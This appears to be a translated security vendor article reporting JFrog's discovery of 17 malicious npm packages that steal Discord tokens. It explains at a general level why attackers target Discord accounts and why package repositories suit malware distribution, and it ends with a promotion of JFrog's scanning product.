JFrog discovers 17 new malicious npm packages
The JFrog Security research team continuously monitors popular open source software (OSS) repositories with automated tools and reports any discovered vulnerabilities or malicious packages to the repository operators and the wider community. Recently, 17 malicious packages were revealed in the PyPI repository, which show that the attacks are becoming more and more sophisticated. The advanced circumvention techniques used in the PyPI malware packages indicate the worrying trend that attackers are increasingly camouflaging their attacks on open source software.
The 17 malicious packages in the npm repository (Node.js package managers), discovered by the automatic scanning tools, are deliberately aimed at attacking a user’s Discord token. These are a series of letters and numbers that serve as an authorization code for accessing the Discord servers. So the threat actor has full access to the victim’s Discord account when he obtains a victim’s Discord token. Fortunately, these packages were removed before they could register a large number of downloads (based on the npm records), so a scenario similar to the last PyPI revelation could be avoided. Back then, malicious packages were downloaded tens of thousands of times before they could be discovered and removed.
The payload of the packages is diverse and ranges from infostealers to complete backdoors for remote access. In addition, the packages have different infection tactics, including typosquatting, confusion of dependencies and Trojan functionalities.
Discord tokens popular with criminals
Recently, there has been a wave of malware appropriating Discord tokens, which was previously reported in PyPI publications (for example, noblesse, DiscordSafety), and now also in the npm repository. Discord is a ubiquitous digital communication platform with over 350 million registered users that enables communication via voice calls, video calls, text messages and media files (or any other files). This is done either privately (from user to user), or in permanent virtual rooms called “servers”. Against this background, the question arises: why do attackers steal Discord tokens?
During the research, JFrog’s security researchers found out four “tempting” reasons:
1. Use of the Platform as part of an attack
Discord servers are often used as anonymous Command & Control (C2) servers that control a Remote Access Trojan (RAT) or even an entire botnet. Alternatively, the Discord servers can also be used as an anonymous exfiltration channel. Previous research shows that the “Noblesse” malware family uses Discord webhooks to exfiltrate stolen data. If an attacker obtains any Discord users/servers, this allows a better anonymization of the attack, since any attack can be traced back to the legitimate user and not to the attacker with these credentials.
2. Spreading malware to Discord users
Hacked Discord accounts can be used for social engineering purposes to further spread malware – either manually or automatically via a worm. The likelihood that a victim will accept (and execute) any file from a friend’s Discord account is much greater than a file sent by a complete stranger.
3. Sale of stolen premium accounts
Discord offers a premium service called “Discord Nitro”. This service unlocks various cosmetic options for the user (emojis, badges, etc.), as well as the ability to “boost” selected servers, which improves the call and video quality of the streams on this server. Attackers could be targeting Discord accounts that bought Nitro in order to resell them cheaply on an online marketplace. This strategy is, for example, on the marketplace “playerup.com ” to watch.
4. Easy availability of Discord token grabbers
Due to the popularity of this method of attack, there are quite a lot of Discord token grabbers that have been published on Github with building instructions:
An attacker can take one of these templates and then develop a custom malware without having extensive programming knowledge.
Here it is important to note that, in comparison with a full-fledged RAT backdoor, these payloads are less likely to be intercepted by antivirus solutions, since a Discord stealer does not modify files, does not register anywhere (to be executed, for example, at the next startup) and does not perform suspicious operations, such as creating child processes.
The malware found in the npm repository is very similar to the malicious packages detected by PyPI malware monitoring already performed by JFrog. Attackers, as a rule, use public hack tools with slight modifications (or even unchanged tools), obfuscated with public obfuscators.
At the moment, there is a flood of malicious software that is hosted and distributed via open source software repositories. Public repositories have become a convenient tool for spreading malware: the repository’s server is a trusted resource, and communication with it does not cause distrust of antiviruses or firewalls. In addition, the ease of installation via automation tools such as the npm client provides an ideal attack vector.
Revealing new malicious packages and the techniques used by malware authors increases the security of popular repositories. In addition, it is recommended to take proactive precautions and manage the use of npm for software curation accordingly, so that the risk of malicious code being introduced into companies is significantly reduced. In addition to detecting new vulnerabilities and threats, JFrog Xray’s automatic security scanning provides developers and security teams with easy access to the latest relevant information about the software used in these scenarios.